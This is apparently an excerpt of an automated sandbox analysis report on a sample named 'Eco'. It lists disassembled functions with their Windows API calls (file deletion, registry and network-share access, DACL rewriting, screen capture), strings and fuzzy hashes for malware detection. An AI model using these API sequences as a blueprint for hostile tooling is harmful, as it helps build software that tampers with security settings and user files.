                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0057A743
                          • _memset.LIBCMT ref: 0057A762
                          • _wcsncpy.LIBCMT ref: 0057A79E
                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0057A7D3
                          • CloseHandle.KERNEL32(00000000), ref: 0057A7DE
                          • RemoveDirectoryW.KERNEL32(?), ref: 0057A7E7
                          • CloseHandle.KERNEL32(00000000), ref: 0057A7F1
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                          • String ID: :$\$\??\%s
                          • API String ID: 2733774712-3457252023
                          • Opcode ID: 7cfd7a7e2faa529ef08b8e4bf5255754f256727f8eee2dfeeafdb3cf7d982841
                          • Instruction ID: 4bee5bed9b56c739515a219f0597fc9f4eab7355109c6737b8ca4b81175debfe
                          • Opcode Fuzzy Hash: 7cfd7a7e2faa529ef08b8e4bf5255754f256727f8eee2dfeeafdb3cf7d982841
                          • Instruction Fuzzy Hash: 983192B151020AABDB209FA0DC49FEF3BBCFFC9700F1040A6F909D61A1E77096859B25
                          Function 0059C5CF Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0059C61F
                          • GetFocus.USER32 ref: 0059C62F
                          • GetDlgCtrlID.USER32(00000000), ref: 0059C63A
                          • _memset.LIBCMT ref: 0059C765
                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0059C790
                          • GetMenuItemCount.USER32(?), ref: 0059C7B0
                          • GetMenuItemID.USER32(?,00000000), ref: 0059C7C3
                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0059C7F7
                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0059C83F
                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0059C877
                          • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0059C8AC
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                          • String ID: 0
                          • API String ID: 1296962147-4108050209
                          • Opcode ID: c5a9e907ee49f4a6c469ee7a78dd5dde5de1b4224bf892c378ec5a575453ad6b
                          • Instruction ID: a422689b43ab09559c533fa910e256d906d4d691e6868838a854fe3debdac1fb
                          • Opcode Fuzzy Hash: c5a9e907ee49f4a6c469ee7a78dd5dde5de1b4224bf892c378ec5a575453ad6b
                          • Instruction Fuzzy Hash: 87817D70608301AFDB24CF18D884A6BBFE8FB89354F04492EF99597292D770D945DFA2
                          Function 005688AD Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00568C03: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00568C1F
                            • Part of subcall function 00568C03: GetLastError.KERNEL32(?,005686E3,?,?,?), ref: 00568C29
                            • Part of subcall function 00568C03: GetProcessHeap.KERNEL32(00000008,?,?,005686E3,?,?,?), ref: 00568C38
                            • Part of subcall function 00568C03: HeapAlloc.KERNEL32(00000000,?,005686E3,?,?,?), ref: 00568C3F
                            • Part of subcall function 00568C03: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00568C56
                            • Part of subcall function 00568CA0: GetProcessHeap.KERNEL32(00000008,005686F9,00000000,00000000,?,005686F9,?), ref: 00568CAC
                            • Part of subcall function 00568CA0: HeapAlloc.KERNEL32(00000000,?,005686F9,?), ref: 00568CB3
                            • Part of subcall function 00568CA0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,005686F9,?), ref: 00568CC4
                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00568911
                          • _memset.LIBCMT ref: 00568926
                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00568945
                          • GetLengthSid.ADVAPI32(?), ref: 00568956
                          • GetAce.ADVAPI32(?,00000000,?), ref: 00568993
                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 005689AF
                          • GetLengthSid.ADVAPI32(?), ref: 005689CC
                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 005689DB
                          • HeapAlloc.KERNEL32(00000000), ref: 005689E2
                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00568A03
                          • CopySid.ADVAPI32(00000000), ref: 00568A0A
                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00568A3B
                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00568A61
                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00568A75
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                          • String ID:
                          • API String ID: 3996160137-0
                          • Opcode ID: e5a074a29140d2b28a9acab88cf9cf65d38f3cdd9f93d41129383c6aa9f17629
                          • Instruction ID: 6b74645a7380aee7b539e53d6bcbb66ebf72595ed503906c9acb28bc494465cb
                          • Opcode Fuzzy Hash: e5a074a29140d2b28a9acab88cf9cf65d38f3cdd9f93d41129383c6aa9f17629
                          • Instruction Fuzzy Hash: 66614BB190020AAFDF10DFA5DC49EFEBB79FF45310F04822AE915A7290DB359A05DB60
                          Function 005877C9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetDC.USER32(00000000), ref: 0058783E
                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0058784A
                          • CreateCompatibleDC.GDI32(?), ref: 00587856
                          • SelectObject.GDI32(00000000,?), ref: 00587863
                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 005878B7
                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 005878F3
                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00587917
                          • SelectObject.GDI32(00000006,?), ref: 0058791F
                          • DeleteObject.GDI32(?), ref: 00587928
                          • DeleteDC.GDI32(00000006), ref: 0058792F
                          • ReleaseDC.USER32(00000000,?), ref: 0058793A
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                          • String ID: (
                          • API String ID: 2598888154-3887548279
                          • Opcode ID: cde87dbc01b344424b0eb9667fb13935bd967d435fb219f647e4bedf78c52e0f
                          • Instruction ID: 7b18f5eec8f3509e3e7b183f74f0e1e3815d5476bb1e073e41b4578a9c6ac89a
                          • Opcode Fuzzy Hash: cde87dbc01b344424b0eb9667fb13935bd967d435fb219f647e4bedf78c52e0f
                          • Instruction Fuzzy Hash: 76513771904209AFCB15DFA8CC89EAEBBB9FF49310F14841DF95AA7250D731A945CB60
                          Function 0057A2FA Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                          Download Yara Rule
                          APIs
                          • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0057A341
                            • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                          • LoadStringW.USER32(?,?,00000FFF,?), ref: 0057A363
                          • __swprintf.LIBCMT ref: 0057A3BC
                          • __swprintf.LIBCMT ref: 0057A3D5
                          • _wprintf.LIBCMT ref: 0057A48B
                          • _wprintf.LIBCMT ref: 0057A4A9
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: LoadString__swprintf_wprintf$_memmove
                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                          • API String ID: 311963372-2391861430
                          • Opcode ID: f45e1f3bc156a00e230c595acf720f56e3bd1331a36827530cea620628f5ea13
                          • Instruction ID: e41295136ab9f1475fa1b5d0d582dd00243e824e0ba0efcb19b0d7f2eca32d69
                          • Opcode Fuzzy Hash: f45e1f3bc156a00e230c595acf720f56e3bd1331a36827530cea620628f5ea13
                          • Instruction Fuzzy Hash: 4851B37180051AAACF14EBE0ED4AEEEBF79BF65340F104165F40972091EB312F59EBA5
                          Function 0057957D Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00579387: __time64.LIBCMT ref: 00579391
                            • Part of subcall function 00524A8C: _fseek.LIBCMT ref: 00524AA4
                          • __wsplitpath.LIBCMT ref: 0057965C
                            • Part of subcall function 0053424E: __wsplitpath_helper.LIBCMT ref: 0053428E
                          • _wcscpy.LIBCMT ref: 0057966F
                          • _wcscat.LIBCMT ref: 00579682
                          • __wsplitpath.LIBCMT ref: 005796A7
                          • _wcscat.LIBCMT ref: 005796BD
                          • _wcscat.LIBCMT ref: 005796D0
                            • Part of subcall function 005793CD: _memmove.LIBCMT ref: 00579406
                            • Part of subcall function 005793CD: _memmove.LIBCMT ref: 00579415
                          • _wcscmp.LIBCMT ref: 00579617
                            • Part of subcall function 00579B5E: _wcscmp.LIBCMT ref: 00579C4E
                            • Part of subcall function 00579B5E: _wcscmp.LIBCMT ref: 00579C61
                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0057987A
                          • _wcsncpy.LIBCMT ref: 005798ED
                          • DeleteFileW.KERNEL32(?,?), ref: 00579923
                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00579939
                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0057994A
                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0057995C
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                          • String ID:
                          • API String ID: 1500180987-0
                          • Opcode ID: 39eaa23f01962d06a32dc75621fbcd594f20d0c7fe7ce30ec6a5850e34a6bd44
                          • Instruction ID: a2419dcc7860e6ae67596100d81552953c2d984abfb405e80eae5f93a5b6963c
                          • Opcode Fuzzy Hash: 39eaa23f01962d06a32dc75621fbcd594f20d0c7fe7ce30ec6a5850e34a6bd44
                          • Instruction Fuzzy Hash: 35C120B1D00119AADF11DF95DC89ADEBBBDFF95300F0080AAF609E7141EB709A849F65
                          Function 00525BD7 Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00525BF1
                          • GetMenuItemCount.USER32(005D6890), ref: 00560DFB
                          • GetMenuItemCount.USER32(005D6890), ref: 00560EAB
                          • GetCursorPos.USER32(?), ref: 00560EEF
                          • SetForegroundWindow.USER32(00000000), ref: 00560EF8
                          • TrackPopupMenuEx.USER32(005D6890,00000000,?,00000000,00000000,00000000), ref: 00560F0B
                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00560F17
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                          • String ID:
                          • API String ID: 2751501086-0
                          • Opcode ID: a7cdef34c846b858073088f975dd1fd128515b6967e37d7a12c25528b5abee0c
                          • Instruction ID: c14139caf831c3e1012512d0003c57ce793064c1574b8a022100da716be4290f
                          • Opcode Fuzzy Hash: a7cdef34c846b858073088f975dd1fd128515b6967e37d7a12c25528b5abee0c
                          • Instruction Fuzzy Hash: 9A71F17064071ABFEB209B54DC49FAABF68FF46364F204216F528AB1D1D7B16C60DB90
                          Function 0057AD57 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 183COMMON
                          Download Yara Rule
                          APIs
                          • CharLowerBuffW.USER32(?,?,005A0980), ref: 0057ADBB
                          • GetDriveTypeW.KERNEL32(00000061,005C9970,00000061), ref: 0057AE85
                          • _wcscpy.LIBCMT ref: 0057AEAF
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: BuffCharDriveLowerType_wcscpy
                          • String ID: L,Z$all$cdrom$fixed$network$ramdisk$removable$unknown
                          • API String ID: 2820617543-1733661187
                          • Opcode ID: ff5d26d2894ffdef9164843986306e16c4971dfc0a44b91ca4762620b573728e
                          • Instruction ID: 43d3aad70a98515b4c4e64c6b38bfea7789605233e98c31ce43b55cf94f8e4ed
                          • Opcode Fuzzy Hash: ff5d26d2894ffdef9164843986306e16c4971dfc0a44b91ca4762620b573728e
                          • Instruction Fuzzy Hash: 5D519E701083029FC314EF14E896AAFBFA9BFD5700F50881DF89A572D2DB719D49DA82
                          Function 005681DD Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                          • _memset.LIBCMT ref: 0056826C
                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 005682A1
                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 005682BD
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 005682D9
                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00568303
                          • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0056832B
                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00568336
                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0056833B
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                          • API String ID: 1411258926-22481851
                          • Opcode ID: b7bbeb561d87e61906bec4ec1f8e7e56940c7e6e0cb5c16dbc84ee6d9f3d841e
                          • Instruction ID: f4ba9310828edf48f4afdc8164d1ebfa4c54e009d39d9813d67a92cb388b8e93
                          • Opcode Fuzzy Hash: b7bbeb561d87e61906bec4ec1f8e7e56940c7e6e0cb5c16dbc84ee6d9f3d841e
                          • Instruction Fuzzy Hash: 6641097581062DABCB11EBA4DC99DEEBB78FF65740B004129E801A32A1EA305D44CB94
                          Function 00591242 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                          Download Yara Rule
                          APIs
                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,005901D5,?,?), ref: 00591259
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: BuffCharUpper
                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                          • API String ID: 3964851224-909552448
                          • Opcode ID: abe3c5803701e8ce1edae76d2bd0140bfa7080870cf7c314f95991686ca443ff
                          • Instruction ID: b8d1e28b9dbedb43670c2358b684e3dda97f4f6977edb0e28c0db6122aebce7d
                          • Opcode Fuzzy Hash: abe3c5803701e8ce1edae76d2bd0140bfa7080870cf7c314f95991686ca443ff
                          • Instruction Fuzzy Hash: C6419D3011066B8BCF08EF50D9A9AFE3F68BFA1304F401958FC6607682DB749D19CBA4
                          Function 005756EF Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                            • Part of subcall function 0052153B: _memmove.LIBCMT ref: 005215C4
                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00575758
                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0057576E
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0057577F
                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00575791
                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 005757A2
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: SendString$_memmove
                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                          • API String ID: 2279737902-1007645807
                          • Opcode ID: 0de5413d9babadef10a749ce0fe3694a37fe4a5b8b67a4a1d8767af44107a5b5
                          • Instruction ID: 2e7de89828e246d8747be7a7923b5e0486f9d32358676ffd291e5fddfa734466
                          • Opcode Fuzzy Hash: 0de5413d9babadef10a749ce0fe3694a37fe4a5b8b67a4a1d8767af44107a5b5
                          • Instruction Fuzzy Hash: 64116370A5052ABDD724A6A5EC5EEFF7F7CFFE2B40F000469B415A20D1EEA01945C9A0
                          Function 00574A79 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                          • String ID: 0.0.0.0
                          • API String ID: 208665112-3771769585
                          • Opcode ID: 1884c99444b183cf555cc3da1530947d14a4fc1dd9e4dc45bad0d6ea527227c5
                          • Instruction ID: 90b074ceae3164ced518d1a8b7d5fc9b69d7cb9323acd75b0ff01b2bb6046d68
                          • Opcode Fuzzy Hash: 1884c99444b183cf555cc3da1530947d14a4fc1dd9e4dc45bad0d6ea527227c5
                          • Instruction Fuzzy Hash: CA11D232904119ABCB24ABA1AC0AEDA7FBCFF91710F0441A5F00996092EF74D985AF95
                          Function 0057539D Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • timeGetTime.WINMM ref: 005753A2
                            • Part of subcall function 0053074E: timeGetTime.WINMM(?,00000002,0051C22C), ref: 00530752
                          • Sleep.KERNEL32(0000000A), ref: 005753CE
                          • EnumThreadWindows.USER32(?,Function_00065350,00000000), ref: 005753F2
                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00575414
                          • SetActiveWindow.USER32 ref: 00575433
                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00575441
                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00575460
                          • Sleep.KERNEL32(000000FA), ref: 0057546B
                          • IsWindow.USER32 ref: 00575477
                          • EndDialog.USER32(00000000), ref: 00575488
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                          • String ID: BUTTON
                          • API String ID: 1194449130-3405671355
                          • Opcode ID: ecd388bad6073226de1230a98678c771878155256bfcbd6369e1f97f47906ad2
                          • Instruction ID: 0b6cdebe4e154d85b07a0071c610ba3e4a0f3ace7390a5da9cfe35fa247de38c
                          • Opcode Fuzzy Hash: ecd388bad6073226de1230a98678c771878155256bfcbd6369e1f97f47906ad2
                          • Instruction Fuzzy Hash: A5219270106609AFEB105F20FD89B253F6AFBA9346F14641AF509821B1FBA15C58FB26
                          Function 0057DA3D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                            • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
